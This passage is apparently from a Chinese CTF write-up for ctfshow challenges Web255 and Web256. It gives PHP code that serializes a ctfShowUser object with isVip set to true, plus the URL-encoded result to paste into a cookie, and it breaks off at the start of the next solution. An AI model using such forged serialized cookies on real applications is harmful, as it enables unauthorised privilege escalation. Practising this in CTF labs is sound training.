1.Web255
<?php
class ctfShowUser{
public $isVip=true;
}
$a = new ctfShowUser();
echo urlencode(serialize($a));
?>
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
改cookie推荐一个插件很方便
2.Web256
多了一步判断要求username和password的值不相等
cookie传入下列序列化输出的结果
<?php
class ctfShowUser{
public